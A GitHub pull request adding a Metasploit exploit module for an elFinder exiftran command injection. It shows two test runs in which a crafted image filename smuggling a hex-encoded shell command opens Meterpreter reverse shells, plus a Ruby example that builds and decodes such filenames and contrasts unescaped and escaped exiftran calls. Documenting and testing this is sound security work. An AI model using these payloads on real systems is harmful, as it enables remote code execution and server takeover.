
Add elFinder PHP Connector exiftran Command Injection #11545

Merged

Conversation


@bcoles bcoles commented Mar 9, 2019

Add elFinder PHP Connector exiftran Command Injection exploit module. Fixes #11539

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
rhosts => 172.16.191.253
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
verbose => true
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
[*] 172.16.191.253:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
[*] Sending stage (38247 bytes) to 172.16.191.253
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
[!] Tried to delete .kPUXqhMZ.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > 

@space-r7 space-r7 self-assigned this Mar 11, 2019
@space-r7 space-r7 (Contributor) commented

Tested v2.1.47 on Ubuntu:

msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.215.167
rhosts => 172.16.215.167
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
targeturi => /elFinder-2.1.47
msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[*] Uploading payload 'foK272.jpg;echo 6370202e2e2f66696c65732f666f4b3237322e6a70672a6563686f2a202e33486c323733722e706870 |xxd -r -p |sh& #.jpg' (1853 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder-2.1.47/php/.3Hl273r.php) ...
[*] Sending stage (38247 bytes) to 172.16.215.167
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.167:57360) at 2019-03-11 12:28:41 -0500
[!] Tried to delete .3Hl273r.php, unknown result
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64
Meterpreter : php/linux

Code looks good to me, so I can land this soon.

@space-r7 space-r7 merged commit 6d14a53 into rapid7:master Mar 11, 2019
space-r7 added a commit that referenced this pull request Mar 11, 2019
msjenkins-r7 pushed a commit that referenced this pull request Mar 11, 2019

space-r7 commented Mar 11, 2019

Release Notes

The unix/webapp/elfinder_php_connector_exiftran_cmd_injection exploit module has been added to the framework. This exploits a command injection vulnerability in elFinder versions < 2.1.48. elFinder allows for resizing and rotating images by passing the image file data, including unsanitized file names, to the exiftran utility. Code execution can be achieved when performing an image operation on a file whose name contains shell commands.

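The following Ruby is an added example and is not the PR's module code or elFinder's own code. It rebuilds the upload filename visible in the module output above (the hex in `CDj7j1.jpg;echo 6370...` decodes to `cp ../files/CDj7j1.jpg*echo* .kPUXqhMZ.php`, which copies the uploaded "image", really the PHP payload, into the connector's `php/` directory), decodes such a filename back to its command, and contrasts an exiftran call that splices the filename in verbatim with one that escapes it. The exact exiftran argument shape (`-i -<degrees>`) and the `safe_filename?` allowlist are assumptions for illustration; the page does not show elFinder's command line.

```ruby
# Added example, not the exploit module's or elFinder's code. The exiftran
# invocation shape and the allowlist regex below are assumptions.
require 'shellwords'

# Build the filename the exploit uploads. The command is hex-encoded and
# decoded server-side with xxd because a Linux filename cannot contain '/',
# which the `cp ../files/...` command needs. Once the name lands unquoted on
# a shell command line, `;` ends the exiftran command, `echo <hex> | xxd -r -p
# | sh &` runs the decoded command in the background, and `#` comments out the
# trailing `.jpg`, which only exists so the upload still looks like an image.
def payload_filename(stub, php_name, upload_dir: '../files/')
  # The glob `<stub>.jpg*echo*` matches the uploaded file itself, whose name
  # starts with `<stub>.jpg` and contains `echo`.
  cmd = "cp #{upload_dir}#{stub}.jpg*echo* #{php_name}"
  hex = cmd.unpack1('H*')
  "#{stub}.jpg;echo #{hex} |xxd -r -p |sh& #.jpg"
end

# Recover the command hidden in such a filename; returns nil for ordinary names.
def decode_payload_filename(filename)
  m = filename.match(/;echo ([0-9a-f]+) \|xxd -r -p \|sh&/)
  m && [m[1]].pack('H*')
end

# Assumed server-side invocation. With `safe: false` the path is spliced in
# verbatim, so `;`, `|`, `&` and `#` inside it are interpreted by the shell.
# With `safe: true` Shellwords.escape makes the whole path one argument.
def exiftran_command(path, degrees, safe:)
  arg = safe ? Shellwords.escape(path) : path
  "exiftran -i -#{degrees} #{arg}"
end

# Independent allowlist for uploaded names: a second layer on top of escaping.
SAFE_NAME = /\A[A-Za-z0-9_][A-Za-z0-9_.\-]*\z/
def safe_filename?(name)
  !!(name =~ SAFE_NAME) && !name.include?('..')
end

if $PROGRAM_NAME == __FILE__
  name = payload_filename('CDj7j1', '.kPUXqhMZ.php')
  path = "../files/#{name}"
  puts "upload name : #{name}"
  puts "decodes to  : #{decode_payload_filename(name)}"
  puts "unsafe cmd  : #{exiftran_command(path, 90, safe: false)}"
  puts "escaped cmd : #{exiftran_command(path, 90, safe: true)}"
  puts "allowlisted?: #{safe_filename?(name)}"
end
```

`Shellwords.split` is used in the checks only to show that the escaped path survives as a single argument; it is not a full shell parser, which is exactly why the allowlist check is worth keeping alongside escaping.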
@bcoles bcoles deleted the elfinder_php_connector_exiftran_cmd_injection branch March 11, 2019 20:15